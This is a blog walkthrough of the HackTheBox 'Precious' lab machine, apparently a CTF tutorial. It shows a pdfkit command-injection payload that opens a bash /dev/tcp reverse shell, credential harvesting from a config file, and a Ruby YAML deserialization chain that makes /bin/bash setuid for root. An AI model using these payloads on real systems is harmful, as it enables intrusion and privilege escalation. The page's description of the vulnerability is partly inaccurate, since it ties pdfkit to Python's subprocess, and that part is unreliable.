precious_htb

Precious HackTheBox [HTB] | Walkthrough

By /

Introduction

In this post, You will learn how to CTF precious challenge. Below is the video format of the post do check that if you have any doubts.

* The video will be uploaded on youtube’s main channel after the retirement of the box until the video will be in odysee.com

Video

Precious Hacking Phases

  1. Adding IP in /etc/hosts
  2. Nmap scan
  3. dirb
  4. Finding Vulnerability in PDF file
  5. Reverse shell access
  6. Privilege Escalation (Vertical Privilege Escalation)

Advertisement

Let’s start

Hey you ❤️ Please check out my other posts, You will be amazed and support me by following on youtube.

https://www.youtube.com/@hackingrick

Adding IP to hosts

Open terminal go /etc/hosts

cat /etc/hosts
nano /etc/hosts

Use nano editor and add the IP address of the precious box in the hosts like the below image.

Now we are ready to CTF the box. Type the precious.htb IPv4 address in the browser you should see this.

Nmap scan

By doing the nmap scan I have found the port 22 and the port 80 are open and I thought hmm there is way to connect using the ssh.

Port 22 uses ssh, Which is suspicious in this CTF.

nmap -p- -sV -sC 10.10.11.189

Dir Enumeration & Subdomain Enumeration

Unfortunately, I didn’t find any useful information. The truth is I didn’t find any information at all. 

dirsearch -u precious.htb
wfuzz -c -f subdomains.txt -w /usr/share/amass/wordlists/subdomains.lst -u "edu.precious.com" -H "Host: FUZZ.precious.htb" --hl 39

I used the wfuzz to find any possible subdomains but I couldn’t…

Enumerating the site in browser

If we go to that site we could see a page where it web pages to pdf.

I thought of entering the payload and seeing what response it gives and I was suspicious that can I download a pdf from this site.

Then I started the python server in order to get something for the site.

python3 -m http.server --bind 127.0.0.1 80
or
python3 -m http.serevr --bind 127.0.0.1 80

Once your server is running, go back to precious.htb and enter the IP address and port number your server is running on…

Now a pdf file will be opened just download it.

Just save it in downloads directory.

Now, let’s use exiftool against the pdf file which we have downloaded. 

exiftool < file name>

Down below we could see the creator which is generated by pdfkit v0.8.6, I thought google it and eventually found a possible vulnerability.

Which is CVE-2022–25765 to know more about the vulnerability [click here]

Vulnerability in version 0.8.7 of pdfkit that could allow a remote attacker to execute arbitrary code on the system where pdfkit is being used.

This vulnerability was caused by pdfkit’s use of the subprocess module in Python to execute shell commands, which could be exploited by an attacker who was able to pass malicious input to pdfkit.

Ok now we have found the vulnerability what next ????

Reverse shell access

Let’s create a payload and try to upload on the site search option and let’s try to get reverse shell connection using netcat or using pwncat.

So, the payload is like this for me…

http://10.10.16.72/?name=#{'%20`bash -c 'exec bash -i &>/dev/tcp/10.10.16.72/443 <&1'`'}

For the IPv4 address I used tun0, and port I used is 443.

sudo ifconfig tun0

Note: Run netcat first and then upload the payload and click submit.

Now open a terminal and run netact and then go to precious.htb and upload the payload and click submit.

nc -nlvp 443

Now you have got access to precious through reverse shell horrrray ????

cd.. come to home directory
ls
cd ruby
ls
ls -la
cd .bundle
ls
cat config

You could see we have got password for henry through ssh let’s connect.

Post Enumeration

ssh henry@10.10.11.189

Enter the password found in the config file.

ls
cat user.txt

Finally, we have found the user flag ????

Privilege Escalation ( Vertical privilege escalation)

I did the below command in netcat to see what response I get.

sudo -l
cat /opt/update_dependencies.rb

By looking at the code we could see it is written in yaml, I tried to change the code so, I get privilege for henry users. 

cat > dependencies.yml

Inside that file add the below code.

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "chmod +s /bin/bash"
         method_id: :resolve

Once the code is added to the file save it.

Let’s run update_dependencies…

sudo /usr/bin/ruby /opt/update_dependencies.rb

Now enter the below command to get root access.

/bin/bash -p
cd /root
ls
cat root.txt

Here we go got the root flag.❤️

Conclusion

If you are interested in learning in-depth about the challenge take a look at yt video and see you guys in next post ✌????

Advertisement

Also Read: HTB walkthroughs

Related Posts

Ads Blocker Image Powered by Code Help Pro

Ads Blocker Detected!!!

We have detected that you are using extensions or brave browser to block ads. Please support us by disabling these ads blocker.Our website is made possible by displaying Ads hope you whitelist our site. We use very minimal Ads in our site

 

Scroll to Top